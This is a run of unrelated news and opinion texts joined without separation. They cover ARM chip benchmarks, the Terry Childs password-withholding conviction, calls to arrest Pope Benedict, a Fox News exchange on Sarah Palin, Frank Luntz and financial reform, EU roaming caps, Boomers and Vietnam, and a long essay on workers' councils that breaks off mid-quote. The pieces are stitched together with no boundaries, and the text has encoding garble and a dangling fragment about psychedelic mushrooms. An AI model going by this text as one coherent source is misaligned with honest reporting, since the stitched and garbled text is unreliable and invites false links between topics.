New chips based upon ARM Cortex - A9 derivatives , like the NVIDIA Tegra 2 , address many of the performance weaknesses we encountered with the Freescale i.MX515 .
If ARM is to achieve sustained victories in the netbook space – let alone in the more performance demanding notebook and desktop spaces – ARM must substantially improve floating - point thoughput .
While the dedicated functional block approach used by ARM and its legions of licensees to provide image manipulation , video decoding / encoding , security and Java acceleration is still valid , it is not a substitute for double - precision floating - point performance .
ARM representatives told us for this report that the Cortex - A9 “ has substantially improved floating - point performance . ”
It will take a big jump forward to catch their x86 rivals , but if ARM pulls it off , Intel , AMD and VIA are going to have a big , bloody war on their hands .
It is conceivable the x86 empire might finally see the boundaries of its swelling , vast territories begin to retract in the near future under an army ant - like assault of tiny , fast , cheap , multi- core ARM microprocessors coming at them from dozens of different companies .
ARM ’s success might also have a negative impact on Microsoft , since Linux will almost certainly play a major role in ARM ’s ability to storm the netbook , “ nettop , ” notebook and even desktop spaces .
Whatever the outcome , it ’s time to pay attention to ARM .
Our results clearly demonstrate how it was possible for an ARM chip to steal the Apple iPad away from Intel ’s Atom .
The Apple iPad might represent merely the first of many ARM victories in its escalating war against the x86 world .
Note about the author
Last summer after eight years there , Van Smith left his job at Centaur Technology to form the company Cossatot Analytics Laboratories .
Van was head of benchmarking for Centaur and represented VIA Technologies within the BAPCo benchmark consortium .
Van has written a number of computer benchmarks including OpenSourceMark and miniBench and he has influenced or directly contributed to many others .
For instance , Van wrote the cryptography tests in SiSoftware Sandra .
Van ’s in - depth knowledge of microprocessing architecture and mission - critical testing led Intel to famous Tom ’s Hardware article which caused a recall of the Pentium III 1.13 GHz processor .
Nearly ten years ago , Van departed his post as a Senior Editor on Tom ’s Hardware Guide to form his own website , Van ’s Hardware Journal [ VHJ ] .
Van was recently interviewed and quoted in a CNN article based upon his career as an investigative journalist .
Van also served as Senior Analyst for InQuest Market Research .
On Bright Side of News * , we have the privilege of having Van as our resident expert on microprocessing architectures and work on developing unified benchmarking solutions so that you , our dear readers – can get fair apples - to - apples comparisons even if at first , it does n’t look possible to do a side - by - side comparison .
We ’ll be looking into a number of products from consumer and commercial space .
Original Author : Van Smith
Webmaster ’s note :
This news article is part of our extensive Archive on gadget news that have been happening in the past 10 years .
For up to date stuff we would recommend a visit to our homepage .
Additionally , we take great pride in our user manual section , as well as our VPN Troubleshooting guide , so be sure to check them out as well .
A former San Francisco network engineer was convicted of felony computer tampering Tuesday after a trial in which prosecutors portrayed him as bent on protecting his " kingdom " - the city system he created - by refusing to surrender passwords to his bosses .
Terry Childs , 45 , of Pittsburg , was found guilty of a felony charge of denying computer access .
The Superior Court jury also concluded that his crime cost the city more than $ 200,000 , making him eligible for a maximum state prison sentence of five years .
However , Judge Teri Jackson is expected to impose a sentence under which Childs would serve a few additional months at most , after she gives him credit for the nearly two years he has spent in county jail since being arrested in July 2008 .
Sentencing is set for June 14 .
Prosecutors argued that Childs had decided to wall off his supervisors from the city network he had built when he learned he could be laid off from the Department of Telecommunications and Information Services , where he had worked for 10 years .
Childs also was angry that his bosses were questioning his security clearance after learning that he had previously been convicted of robbery , prosecutors said .
Newsom testifies
The four - month trial featured the testimony of Mayor Gavin Newsom , who finally obtained the login and passwords to the computer system in a jailhouse interview with Childs , more than a week after the network engineer left the department .
Newsom testified that the city had been " in peril " because officials were blocked from access to police records , payroll data and other information .
The jury deliberated for several days before a lone holdout against conviction was removed from the panel , for reasons that were not disclosed .
After an alternate was put in that juror 's place , the panel started over and reached a decision in a matter of hours .
Jurors interviewed after the verdict said the city had been partly responsible for letting the situation with Childs get out of control .
" We had a lot of sympathy for him , " said juror Jason Chilton , who is a network engineer .
" He was put in a position he should not have been put in .
" Management did everything they possibly could wrong , " Chilton said .
" There was ineffective management , ineffective communication .
I think that if they put the city on trial , they would be guilty , too . "
' Wanted to be needed '
However , he said , the panel agreed that Childs had acted illegally .
" He wanted to cement his position , " Chilton said .
" He wanted to be needed by the city , no matter what the cost . "
Prosecutor Conrad del Rosario told jurors that when the prospect of layoffs arose in spring 2008 , Childs told a co-worker , " They can't screw with me .
I 've got the keys to the kingdom . "
When Childs ' bosses asked him that July how to get into the computer system he had built , Childs first stalled , then provided bogus passwords , del Rosario said .
Childs was suspended , the prosecutor said .
" At this point , the city of San Francisco ( did ) not have control of its system , " del Rosario said .
Only when jailed , prosecutors say , did Childs finally give the information to Newsom on July 21 , 2008 .
No danger
Childs ' attorney , Richard Shikman , said the city computer network had never been at risk .
He portrayed Childs as a hardworking , dedicated professional who sacrificed his personal life to build a system that he guarded from security intrusions .
Shikman acknowledged that Childs may have been " paranoid " about protecting the system and undiplomatic with his bosses , but nothing worse .
Childs initially refused to hand over the passwords because his bosses were asking him to do so over an unsecure phone line , Shikman said .
" All they had to do was ask him ( for the passwords ) in a secure and professional way , consistent with policy and standards , " Shikman told the jury .
" I 'm disappointed at the verdict - he 's very decent man , " the defense attorney said after the verdict was announced .
" He does n't deserve this . "
A Popemobile stained with rotting aubergines .
A papal convoy protected by low - flying military helicopters and battalions of gun-toting special agents .
Call them reasonable predictions for Pope Benedict 's visit to the UK in September , but could he really be detained by British police ?
Arresting the Pope for crimes against humanity may seem a pipe dream , yet it 's possible , if scientist Richard Dawkins and writer Christopher Hitchens prove the case .
They believe they will .
The alleged criminal complicity in covering up systematic child sex abuse is being investigated by various networks worldwide .
The grounds for immunity against being prosecuted for them are being queried by senior British legal experts , Geoffrey Robertson QC and Mark Stephens .
Dawkins and Hitchens want the immunity grounds removed so that Benedict can be arrested and charged once he sets foot in Britain .
Some say the demand is a headline - grabbing stunt , yet its intricacies question the Vatican 's claim for diplomatic immunity against child abuse and other prosecutions worldwide .
Equality before the law is such a basic assumption that people go about their everyday life thinking state authorities do n't make exceptions , especially in criminal cases and when children are at stake .
Or did , until they heard rollercoaster revelations about the Vatican 's role in relation to child abuse in Ireland , Germany , Italy and the US .
Benedict is implicated both as Pope and , especially , for what he did or did n't do as head of the Congregation for the Doctrine of the Faith .
Hitchens argues that it's a matter of conduct , not religious belief -- which addresses the Vatican press office 's claims that atheists and agnostics are on a crusade against the Catholic Church .
Why should a priest anywhere be above civil law , he asked ?
Dawkins calls Benedict " grotesquely tainted " .
For many reasons , there 's a great gap between Benedict condemning the Irish hierarchy 's " grave errors of judgment " and his almost contemptuous refusal to discuss his role in handling abuse cases at Wisconsin , Munich and Oakland , California .
Why should he not answer legitimate questions in a civil court ?
The questions are legion .
For example : As Cardinal Ratzinger , Benedict overruled a local bishop in California who wanted 38 - year - old Fr Stephen Kiesle defrocked .
Kiesle tied up and raped Catholic boys aged 11 to 13 , among other offences .
Ratzinger saw the issue differently .
" This ( church ) court , although it regards the arguments presented in favour of removal in this case to be of grave significance , nevertheless deems it necessary to consider the good of the universal church together with that of the petitioner , " he wrote in Latin , " and it is also unable to make light of the detriment that granting the dispensation can provoke with the community of Christ 's faithful , particularly regarding the young age of the petitioner . "
Extraordinary stuff .
The ' young age ' mentioned is the 38 - year old , not the children he attacked .
If the man were defrocked , Ratzinger 's reasoning goes , lay people would be alerted to the crime and their faith in the church could be damaged .
So would the church 's moral authority .
Despite the worldwide furore , and decades of ( mis ) managing abuse , the Vatican waited until Monday of this week to change its standing order about reporting to church rather than civil authorities .
That amounts to years of flaunting its alleged status as a separate state , entitled to enforcing its own laws elsewhere because of diplomatic immunity .
The history bit goes back to a deal done between the dictator Benito Mussolini and Pius XI in 1929 , where Mussolini recognised a new independent Vatican City State , in exchange for Pius relinquishing claims to other Italian territories .
Mussolini paid hefty compensation and gave the Vatican control of marriage and family law .
In return , Pius XI effectively enabled Mussolini to consolidate his political power and go on to make alliances with Adolf Hitler .
Pius invested the money and grew the Vatican bank .
Robertson and Stephens , the British lawyers , believe the Mussolini - Pius deal was a piece of ad - hockery that is suspect under international law .
If / when they prove it , the Vatican 's special status at the UN will come into question , diminishing its claims to be a state like any other .
Smoke and mirrors , rather than built on rock .
It 's uncanny how the Vatican State straddles both sides of the maxim about giving separately to Caesar and to God , secular and sacred .
US Catholics , always more vocal , are opening another flank in the campaign against clerical child abusers by calling for an independent commission to examine the problems , make recommendations and open the way for a Vatican III .
The push for change is coming within and without the Catholic Church .
Despite all that , one of the Vatican 's most recent initiatives is to order an investigation of every American order of nuns in case they are straying from CDF guidelines .
Practising reiki is on the charge list .
Cynics might wonder why the Vatican is trying to keep religious women in check but no doubt the CDF has its own reasons .
What they are is quite a mystery .
Paddy Powers would scoff at the odds of PM Cameron or Brown having Benedict arrested in Britain but he certainly wo n't get the welcome John Paul II did 28 years ago .
Leave the last words to Bob Dylan , as Sinead O'Connor interpreted them so truthfully on The Late Late Show .
" Your sons and your daughters are beyond your command , your old road is rapidly agin ' , Please get out of the new one if you can't lend your hand .
For the times they are a - changin ' . "
Irish Independent
Sean Hannity is starting to sound a lot like Grandpa Pat Buchanan with his praise of his girlfriend Sarah Palin .
Juan Williams tells Hannity that " he 's really out there tonight " with his praise of Palin and when he dares to point out that the reason for his fawning might be Hannity being physically attracted to her Hannity gets a little bit defensive .
Hannity : I think she ’s gone a long way to opening the door for people to say alright , maybe she was treated unfairly .
Williams :
No but she was very human and funny in that segment .
It ’s not going to convince seventy five percent of the American people who do n’t think she ’s qualified to be president but clearly she ’s a warm , attractive and I know that you think extremely attractive human being .
Hannity : What does that mean ?
I think … what is that all about ?
Williams : I think she is a superstar centerfold for conservative men …
Cupp : Eeeewww … .
Centerfold … Hannity : Why are you making this …
I think she ’s great .
I think she ’s gutsy .
I think she ’s courageous and I ’ll tell you what …
I think she ’s smarter than Barack Obama .
She would n’t lead us into this socialist utopia .
She would n’t bow before …
Williams :
You are just so wild on this point .
That ’s why I just excuse you my pal .
I will say go right ahead Sean .
You know , your libido is getting in the way of your thinking …
Hannity :
You ask me I ’ll take Gov. Palin as president over Barack Obama .
Who do you think ?
Williams : Come on .
Hannity : Come on ?
Hannity goes on to slam the president and say he 's the worst since Jimmy Carter and Williams responds .
Oh my god you are really out there tonight .
No Juan , he 's out there every night .
I just found it humorous that someone actually called one of these guys for allowing the wrong brain to lead them with their love of her .
No matter how lame you are as the supposed “ liberal ” on Cluster Fox I would like to thank you for giving Hannity a hard time in this segment .
Buchanan gets called out for his Palin infatuation on MSBNC so often that it ’s pretty much a running joke on that network .
I ’d like to see Williams do the same thing to Bloody Bill Kristol on Fox News Sunday on a regular basis .
DNC blasts Politico story challenging origin of GOP talking points
Under attack for authoring the Republican strategy to link financial reform legislation to “ permanent bailouts ” for Wall Street , Frank Luntz claims his widely - publicized memo was merely “ defending economic freedom . ”
But the messaging guru appears to have a little - noticed ulterior motive Ã¢â‚¬â€œ corporate clientele invested in scuttling the bill .
ADVERTISEMENT
Luntz is founder , president and CEO of consulting firm Luntz , Maslansky Strategic Research , which boasts on its Web site of representing Wall Street clients such as Bank of America , Wachovia , Chase Card Services and UBS .
The firms are among those lobbying to scuttle or water down Senate Democrats ’ financial reform package , which aims to regulate derivatives , complex financial products which are a key profit driver for large financial firms and played a role in the Wall Street meltdown of 2008 .
While the striking similarities between Luntz ’s advice and the ensuing GOP plan of attack have been widely documented Ã¢â‚¬â€œ and directly called out by the White House Ã¢â‚¬â€œ numerous Republicans deny he was the originator of their “ bailout ” talking point , in PoliticoÃ¢â‚¬â „ ¢s lead story Thursday .
“ After hearing Republicans uniformly parroting Luntz talking points meant to falsely smear the bill verbatim before they had even read it , you do nÃ¢â‚¬â „ ¢t need a pollster to figure out how many people believe this story — zero , ” DNC press secretary Hari Sevugan emailed Raw Story on Thursday , dismissing Republicans ’ claims that Luntz was n’t the source of their anti-reform message .
“ If you buy this , ” added DNC communications director Brad Woodhouse , “ I got some ocean front property to sell you in Arizona . ”
Luntz wrote in his 17 - page document in January , “ Frankly , the single best way to kill any legislation is to link it to the Big Bank Bailout . ”
Senate Minority Leader Mitch McConnell ( R - KY ) and GOP colleagues have often claimed in recent weeks that the bill “ institutionalizes … taxpayer - funded bailouts of Wall Street banks . ”
ADVERTISEMENT
The claim has been debunked by PolitiFact as “ false ” and rejected by the New York Times , which reports that “ [t ] he bill would stop taxpayer - financed bailouts . ”
The legislation Ã¢â‚¬â€œ approved by the House in December and currently debated in the Senate , includes stricter regulations on financial institutions Ã¢â‚¬â€œ includes a Consumer Financial Protection Agency to curb predatory lending , restrictions on complex derivatives , and clauses that permit the Federal Deposit Insurance Commission to seize and restructure failing banks .
Luntz is tacitly taking credit for the GOP talking point .
He told Politico that “ there was no language to stop these permanent bailouts , so I wrote it , ” and adding , “ These Republicans who spoke out are just doing their job . ”
ADVERTISEMENT
The corporate strategist has previously written memos on how to scuttle health care and energy reforms , urging Republicans to label the former a “ government takeover ” of the system and , on the latter , to emphasize the ostensible inconclusiveness of climate science .
New rules have come into effect across Europe limiting mobile phone bills for surfing the internet .
From today , customers can oblige mobile phone operators to cut them off when their bill reaches a pre-set amount , when accessing the internet in other European nations .
If users do not put a limit in place by 1 July , it will automatically be set at €50 .
The phone firms will have to warn users when their bill reaches 80 % of the limit .
When Laurie Brooks received her second cancer diagnosis last year , she turned to psychedelic mushrooms to help her handle the anxiety of facing what might have been the end of her life .
The first . . .
The Boomer generation ’s view of war and the purposes of war was and is the result of United States involvement in Vietnam .
Unlike subsequent generations , Boomers ( at least males and tangentially females ) were directly touched by the conflict .
And almost every Boomer , male or female , is drawing upon memories of how Vietnam divided our generation from our parents .
And , how its memory eventually divided our generation and our nation against itself .
Whether Boomers participated in the war , protested against , the war tried to avoid the war , or later turned radical ( either liberal or conservative ) , it almost all came in response to memories of Vietnam .
During the summer of 1964 , while most Boomers were tweens and teens awe struck with Beatlemania or dancing their little hearts out to that Motown sound , LBJ and his military advisers were trying to find a way to increase America ’s presence in South Vietnam .
LBJ , despite his better angels ( he was pushing the Voting Rights Act and other important civil rights legislation through Congress and his “ Great Society ” was already on the drawing board – Medicare / Medicaid , Head Start , VISTA , anyone ? ) had bought LeMay and Westmoreland ’s bullshit about the communist threat in SE Asia and the need to “ save ” South Vietnam to prevent a “ domino effect ” of government overthrows by communists in countries such as Laos , Thailand , and Cambodia .
LBJ bought the argument that the only way to prevent such a catastrophe was to fight the Reds in Vietnam – but the US needed a premise , a provocation , a reason – an excuse .
Thus came the Gulf of Tonkin Incident and Gulf of Tonkin Resolution .
What the Gulf of Tonkin Resolution did was allow President Johnson to wage war without authorization of Congress .
The repercussions of that bit of legislative folly still haunt us today .
Our current quagmires in Iraq and Afghanistan are the direct descendants of that godfather of all quagmires , Vietnam .
But the Iraq and Afghanistan wars pass by the sensors of Millennials with all the impact of , say , the way that epic conflict in Grenada passed by the sensors of Xers .
How come Boomers got so exercised by Vietnam ?
You all know the answer – say it with me : The Draft .
What sets Boomers apart from those generations mentioned above is Selective Service .
And the victory Boomers won was not so much the stoppage of the Vietnam War itself ( that did n’t end until 1975 , the official closing year of “ the ’ 60’s ” ) as it was forcing the ending of compulsory military service for American males .
Boomers considered this a great victory of our generation – American kids would n’t have to fight wars that seem to serve the purposes of our bete noir – the military - industrial complex .
And by ending the government mandated flow of cannon fodder to the military , our generation believed it could eventually end wars .
Our generation , however , in its hubris , failed to consider the power of two things .
One was the craziness of Barry Goldwater ’s run for the presidency in 1964 , highlighted by that famous quote :
“ Extremism in the defense of liberty is no vice . “
And how easily LBJ seemed able to counter that with flower power .
The second was the inspiration that Goldwater ’s failure in 1964 gave to those who have come to dominate political discourse since – eventually even winning over many Boomers – the conservative movement ….
Part 5 to come ….
The latest issue of The Commune featured a supplement with an extended piece on workers ’ councils by Sheila Cohen .
Click image below to see PDF or read full text below .
The red mole may weave unexpected patterns and assume strange disguises ; it is digging , digging fast , and moving in roughly the right direction … ’
Daniel Singer , The Road to Gdansk .
The term ‘ Workers ’ Councils ’ can perhaps stand as a catch - all title for an unpremeditated , quasi- spontaneous , ‘ ground - up ’ organisational form reproduced over many periods and across many countries by groups of workers previously unaware of such a structure or of its historical precedents .
Its highest form the Soviet , its ‘ lowest ’ the simple workplace representatives ’ committee , this formation recurs time and again in situations of major class struggle and even everyday industrial conflict .
Why do workers always , independently and apparently ‘ spontaneously ’ , adopt the same mass meetings - based , delegate - generating , committee - constructed form for their most powerful expressions of resistance ?
The answer is simple , because the form is simple ; the form is constructed from the requirements of the situation , not plucked from thin air .
Workers in a situation of upsurge are unlikely to look around at a range of possible alternatives : the workers ’ council structure , at whatever level , immediately serves the necessities of the situation .
As one account of the Hungarian revolution puts it : ‘ the Hungarian workers had instinctively grasped … that they must break completely with traditional organisational forms …’ ( Anderson 1964 , p107 ) .
Fully - fledged workers ’ councils exist , almost by definition , at times of heightened class struggle , times which generate not only these formations but all the vehicles of class struggle : mass strikes , occupations , sometimes riots .
The analysis of this organisational form is therefore almost inseparable from other aspects of such periods and their key associated characteristics : dual power , direct democracy , self - activity from below , unofficial and extra-union forms of worker organisation , solidarity and class unity , and above all heightened class consciousness .
In what follows , the historical account will be structured in terms of these key common aspects of the workers ’ council formation .
Perhaps most suggestively of all , classical comments on revolutionary change such as those of Marx and Lenin on the Paris Commune and Petrograd Soviet point to a crucial dynamic in which this worker - generated organisational form simultanously challenges the character of the bourgeois state and constitutes itself as a vehicle for its transformation .
In this sense a fusion between organisational form and political transition can also be glimpsed within the workers ’ council formation ; an aspect of revolutionary praxis which perhaps overtakes what critics of Marx have denounced as a mechanistic distinction between base and superstructure .
This contribution will provide historical examples throughout capitalism to illustrate the constant regeneration of the highly specific workers ’ council - based organisational form , from 1840s Chartism to 21st century Argentina .
At the same time it is recognised that the relevance of the workers ’ council ‘ model ’ to contemporary political and economic circumstances is beyond doubt .
This can be summarised in two ways .
Firstly , the twin factors of resurgence and unpredictability evident in the history of workers ’councils are an indication that such formations can recur even in the apparently incongruous context of 21st - century neo-liberalism ; and secondly , the power , poetry and inspiration emerging from these fundamentally working - class organisations stand as a reminder to the left of the continued relevance of class .
‘ Each delegate to be at all times revocable … ’
Perhaps the most crucial feature of the workers ’ council formation is its inherent espousal of direct democracy exhibited in mass meetings , delegate structures , and accountable and revocable ‘ local leaders ’ ( Fosh and Cohen 1990 ) .
Such characteristics are found in some of the earliest working - class upsurges under capitalism , such as Chartism , workers ’ fight for the vote in 1830s and 1840s Britain .
Here a ‘ sizeable network of local leaders developed with astonishing rapidity …’ ( Charlton 1997 , p23 ) .
This rank and file leadership came into its own during the historic General Strike of 1842 in a series of delegate conferences which reflected a still earlier tradition of ‘ cross - trade conferences ’ held as long ago as 1810 .
The same direct , participative forms of democracy recur throughout the series of struggles in the 19th , 20th and even 21st century in which workers ’ council formations are generated in the course of often extremely rapid upsurges of rank - and - file resistance .
In the US Great Upheaval of the late 1870s , railroad workers embarking on mass strikes against wage cuts ‘ chose … delegates to a joint grievance committee , ignoring the leadership of their national unions ” ( Brecher 1997 , p17 ) .
Within days , this form of organisation had spread to embrace a ‘ committee of safety ’ in Toledo , Ohio , ‘ composed of one member from every trade represented in the movement ’ ; as the strike sped on to St Louis , railroad workers at a strike meeting ‘ set up a committee of one man from each railroad , and occupied the Relay Depot as their headquarters ’ ( p32 ) .
Such forms were reproduced almost identically almost 20 years later in a series of massive battles with railroad companies during the 1890s ; workers on strike against Pullman in 1894 ‘ held open meetings daily … a central strike committee with representatives of each local union directed the strike ’ ( p99 ) .
While the newly - launched American Railway Union , led by Eugene Debs , lent strong support , ‘ [ o ] perational control … rested in the strike committees that sprang up within each body of strikers ’ .
In Debs ’ words , ‘ The committees came from all yards and from all roads to confer with us …and we would authorize that committee to act for that yard or that road …’ ( pp101 - 2 ) .
As shown below , such endorsement by established unions is rare ; even Debs , not yet an explicit socialist , ultimately checked the ‘ mass direct action ’ in the Pullman strike for fear of ‘ insurrection ’ ( Brecher 1997 , p114 ) .
While the 19th - century strike waves documented by Brecher are thrilling in their quasi - insurrectionary character , workers ’ struggles during the First World War period posed a far more alarming level of revolutionary potential to an nervous ruling class .
Apart from the Russian soviets , documented further below , the heart of direct democracy and the ‘ workers ’ council movement ’ was to be found in Germany , where the potential for a revolution to build on and support the Soviet example was as strong as its failure was tragic .
One account written by a participant in the events ( Appel 2008 ) documents how , in November 1918 , mutinying sailors ‘ elected delegates who , ship by ship , formed a Council ’ while ‘ during the war similar organisations had made their appearance in the factories .
They were formed in the course of strikes , by elected representatives . ’
Appel comments that ‘ The independent activity of the workers and soldiers adopted the organisational form of councils as a matter of expediency ; these were the new forms of class organisation . ’
While factory councils , according to this account , were seen by the KPD ( the early German Communist Party ) as ‘ a mere form of organisation , nothing more , subject to directives from outside ’ , the workers saw it as ‘ a vastly different matter – a means of control from the bottom up ’ ( p4 ) .
The Italian factory councils movement , particularly in its historic flowering in the Turin of 1920 , again unmistakeably raised the possibility , though not actuality , of workers ’ power .
Such movements , based in the worklace ‘ internal commissions ’ originally nurtured by the official union federation FIOM but taken over by insurgent workers , again embodied patterns of direct democracy .
In the words of one participant in the first - ever factory council , set up in August 1919 : ‘ The key characteristic of the councils was the ability of the rank and file to recall any delegate immediately . ’
By October 1919 the factory councils movement was able to call a conference of delegates from thirty factories representing 50,000 workers ( Mason 2007 , pp246-7 ) .
As Gramsci noted just before the Turin events , ‘ Trapped in the pincers of capitalist conflicts … the masses break away from the forms of bourgeois democracy …’ ( Williams 1975 , p163 ) .
Even in relatively ‘ moderate ’ Britain , soldiers ’ mutinies in 1919 over delayed demobilisation displayed identical features of direct democracy .
One of the most highly organised mutinies took place in Calais , where ‘ strike committees [ were ] functioning in all the camps … A soldiers ’ council was elected , called the “ Calais Area Soldiers ’ and Sailors ’ Association ” , with four or more delegates from the larger camps and two each from the smaller . ’
Government officials warned the Prime Minister that he ‘ should not confer with soldiers ’ delegates … The soldiers ’ delegation bore a dangerous resemblance to a Soviet ’ ( quoted in Rosenberg 1987 , p12 , emphasis in original ) .
In fact , according to “ alarmist ” reports by Bonar Law , ‘ a certain section of the workers [ was ] only too ready and eager …to inveigle the soldiers into an alliance with themselves , on the lines of the Soviet Committees ’ ( p16 ) .
Parallel structures of direct democracy can also be detected in the various worker upsurges of Eastern Europe during the post - Second World War period .
Here , a number of moving accounts of the 1956 confrontation in Hungary , as well as those in Czecholsalvakia , Poland etc , provide rich examples of such grass - roots democracy as part of the workers ’ council formation .
Writing of the outbreak of workers ’ council organisation during the Hungarian revolution , Nagy ( 2006 ) documents how the council delegates ‘ were merely those with the responsibility of carrying out the will of the working class ’ .
For this writer , workers ’ councils ‘ arose quite naturally out of direct workers ’ democracy .
The essential component of accountability is confirmed in another historian ’s comment that ‘ As far as we have been able to dioscover , no one ever questioned the principle that delegates to the Central Councils should be revocable , at all times .
The principle became an immediate reality …’ ( Anderson 1964 , p108 ) .
Daniel Singer ’s compelling account of workers ’ council organisation in Poland in the early 1970s and ’ 80s tells of how , in the Szczecin shipyards , ‘ Each section had five delegates but also elected directly one member of the strike committee .
The latter was no longer dominated by party cardholders but led by the workers …
Surrounded by troops , threatened , the Warski Shipyards paralyzed by the strike was a school for democracy ’ ( Singer 1982 , p173 ) .
Nor are such manifestations of direct democracy confined to early 20th century revolutionary upsurges or to rebellions against the repressive regimes of the ‘ Soviet ’ era .
The 1968 - 74 upsurge in the US , UK and parts of western Europe generated forms of workplace organisation which , if not classical expressions of the workers ’ councils formation , nevertheless demonstrated parallel forms of democracy and accountability :
‘ At the strongest point of union organisation during the upsurge period , multi-union joint shop steward committees in the plants , cross-company combine committees and industry committees exhibited a form of direct democracy rooted in members ’ concrete interests …
Their delegate - based committee structure … ensured a closeness and accountability to the membership lacking in “ representative ” democracy ( Cohen 2006 , p166 ) .
Similarly , in the post - World War II United States a range of oppositional rank - and - file trade union caucuses , based in concrete issues of pay and workplace conditions while simultaneously challenging an often stifling bureaucracy , offered a challenge to the status quo .
By the 1960s , a widespread ‘ revolt from below ’ saw a range of rank - and - file groups ‘ rebell[ing ] … against both company and union . ’
Such workplace - based groups were ‘ the power base for the insurgencies from below that in the last three years have ended or threatened official careers of long standing …
Almost without exception the revolts were conducted primarily to improve the conditions of life - on - the - job ” ( Weir 1967 ) .
In the more dramatic context of the French ‘ May Events ’ , Singer ( 2002 , p314f ) notes the forms of direct democracy which characterised the comites d’action ; in Italy ’s ‘ Hot Autumn ’ strike wave of 1969 , which created both factory councils and cross-union ‘ Comitati Unitari di Base ’ , a ‘ key slogan ’ was ‘ We are all delegates ’ ( Wright 2002 ) .
The empresas ( factory councils ) which sprang up within days of the 1974 coup against Salazar in Portugal are described as ‘ highly democratic ’ , not to mention participative : ‘ The commission at Plessey included 118 workers – all of whom insisted on going to the first meeting with the management ’ ( Robinson 1987 p91 ) .
Most recently of all , the 21st - century upsurge in Argentina generated ‘ new movements … outside the old traditonal trade union organisations , with direct democracy from below and new leaders ’ ( Harman 2002 , p31 ) .
‘ The Same Curious Irritation … ’
As this comment suggests , a related and equally defining characteristic of such delegate - based , accountable workers ’ organisations was their freedom from official and institutional structures , in particular , of course , the established trade unions .
Such independence and autonomy continually recurs as a feature of the workers ’ council formation .
Writing of strike committees among Welsh miners during the 1910 - 14 ‘ Great Unrest ’ in Britain , Dangerfield ( 1961 ) comments that the different South Wales pits ‘ had no specific grievance in common – they simply shared a distrust for the Miners ’ Federation of Great Britain and a scorn for their own Executive ’ ( p242 ) .
Other areas affected by the Great Unrest saw similar disdain for officialdom ; in response to an employer lockout of striking workers in Dublin in 1913 , workers across England staged solidarity action ‘ clearly unofficial in character , conducted by local strike committees acting entirely independently of union officials ’ ( Holton 1976 , p191 ) .
As Dangerfield puts it , the strikes of the Great Unrest ‘ all showed the same curious irritation , the same disposition to disregard Union authority ’ ( p237 ) .
In First World War Germany also , workers ’ councils were seen as ‘ the front line in a workers ’ offensive which the traditional forces of labour were unwilling to lead ’ ( Gluckstein 1985 pp106 -7 ) .
In fact such independence was a central aspect of the success , at least initially , of such mobilisations : ” Free from experience of the “ usual and right way ” of conducting class struggle under normal circumstances , it was the sailors who were to act boldly and nudge the vanguard workers into action ’ ( p112 ) .
The workers ’ councils movement had been preceded in 1917 by ‘ a flood of unofficial strikes [ which ] suddenly swept over the country .
No official organisation led it ’ ( Appel 2008 ) .
Hinton ’s study of British workers ’ committees during the first world war shop stewards ’ movement notes that ‘ because of their delegatory character these committees were capable of initiating and carrying through strike action independent of the trade union officials .
It is this independence that primarily defines the rank - and - file movement ’ ( p296 ) .
Perhaps one of the most historically significant statements of working - class democracy in terms of its essential independence from institutional trade unionism is that contained in an obscure Clyde Workers ’
Committee leaflet of an unspecified date in 1915 :
‘ We will support the officials just so long as they rightly represent the workers , but we will act independently immediately they misrepresent them .
Being composed of Delegates from every shop and untrammelled by onbsolete rule or law , we claim to represent the true feeling of the workers ’ ( quoted in Hinton 1972 , p119 , n4 ) .
This independence from official trade unionism was highly disturbing for the ruling class .
In the British strike wave of 1919 , Churchill remarked that ‘ The curse of trade unionism was that there was not enough of it …’ while the Chancellor of the Exchequer , Bonar Law , went further : ‘… the Trade Union organisation was the only thing between us and anarchy ’ ( Rosenberg 1987 , p68 ) .
Such distrust was echoed by apparently unimpeachably ‘ revolutionary ’ organisations ; in the feverish atmosphere of Italy ’s Biennio Rosso the Turin workers ’ council movement was looked on with suspicion by the Italian trade union federation and main left parties , including the Communists , as ‘ anarchist ’ .
This ‘ fundamental denial of the anarchoid … defined socialism in Italy ’ ( Williams 1975 , p28 : emphasis in original ) .
However , the roots of this dynamic of direct democracy in workers ’ historic class experience is affirmed in the solemn pledge of Balazs Nagy , writing of the Hungarian workers ’ councils :
“ We shall not forget that it was the workers themselves , without any organisation , party , group , trade union or whatever , who as it were re-learned the experiences of the whole history of the workers ’ movement , enriching it as they did so ’ ( Nagy 2006 ) .
‘ Spontaneity ’ and Self - Activity
The same issue of working - class autonomy and self - activity is evident in the almost entirely spontaneous character of workers ’ council generation .
The concept of ‘ spontaneity ’ has long been subjected to critical scrutiny ; most recently , Leopold ’s ( 2007 ) powerful biography of US oil worker activist Tony Mazzochi points to the indispensable role of leadership in working - class organisation and struggle , while contributions such as those of Kelly ( 1998 ) , Darlington ( 2009 ) , Gall ( 2009a , 2009 b ) , and Atzieni ( 2009 ) take up these issues in the context of recent renewed interest in ‘ mobilisation theory ’ .
Nevertheless , it is unquestionable that in looking across the wide historical and geographical range of workers ’ council formation , the notion of spontaneity remains irresistable as a characterisation of the roots and motion of such formations .
Workers ’ councils and parallel formations appear within numerous accounts to be generated spontaneously out of the concrete needs of workers , whether in the workplace or as part of broader workplace - based movements .
During the Chartist movement , upsurges in which ‘ workers temporarily ruled the town ’ were produced by ‘ spontaneous crowd alliances in which trade boundaries and unskilled / skilled boundaries melted into the air ’ ( Charlton 1997 , p6 ) .
Writing on the Paris Commune , also an overtly political struggle , Lenin remarked , ‘ The Commune sprang up spontaneously .
No one consciously prepared it in an organised way ’ ( Marx and Lenin 1968 , p100 ) .
Lynd ( 2003 ) argues that ‘ It now appears that the Russian revolution of 1905 ’ , in which , of course , soviets per se made their first appearance – ‘ was far more spontaneous than Lenin had thought possible …’ ( p51 ) .
As Brecher ’s vivid history of the 1870s Great Upheaval recounts , ‘ [t ] his “ insurrection ” was spontaneous and unplanned ’ ( Brecher 1997 , p16 ) .
Spontaneity is related to the equally central feature of worker self - activity : ‘[ T ]he St Martinsburg strike broke out because the B&O workers had discovered that they had no alternative but to act on their own initiative …’ ( p19 ) .
These are , of course , examples of strikes rather than of workers ’ councils , but the uneven , unpredictable , explosive character of the Great Upheaval revolt is characteristic of all worker upsurges which to a greater or lesser extent embody the workers ’ council formation .
Here strikes , occupations and other forms of direct action merge and demerge into organisational structures of which the archetypal form is the soviet ( see below ) .
Consideration of the workers ’ councils created during the revolutionary period in Germany demonstrates how they appeared and reappeared spontaneously even after opposition and crushing by forces on both right and left .
Appel ( 2008 ) comments that ‘ Perhaps some talk had been heard of Russian soviets ( 1917 - 18 ) but in view of the censorship , very little .
